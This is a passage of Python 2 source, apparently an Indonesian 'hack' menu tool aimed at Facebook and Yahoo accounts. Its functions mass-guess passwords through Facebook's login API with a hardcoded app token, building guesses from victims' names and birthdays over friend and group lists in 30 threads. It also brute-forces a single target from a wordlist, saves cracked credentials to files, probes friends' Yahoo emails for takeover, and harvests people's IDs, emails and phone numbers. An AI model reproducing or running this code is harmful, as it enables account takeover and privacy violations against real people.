global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
else:
pass5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass5
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass5
else:
pass6 = ('sayangku')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass6
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass6
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mAre you sure want to make wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mnot found'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
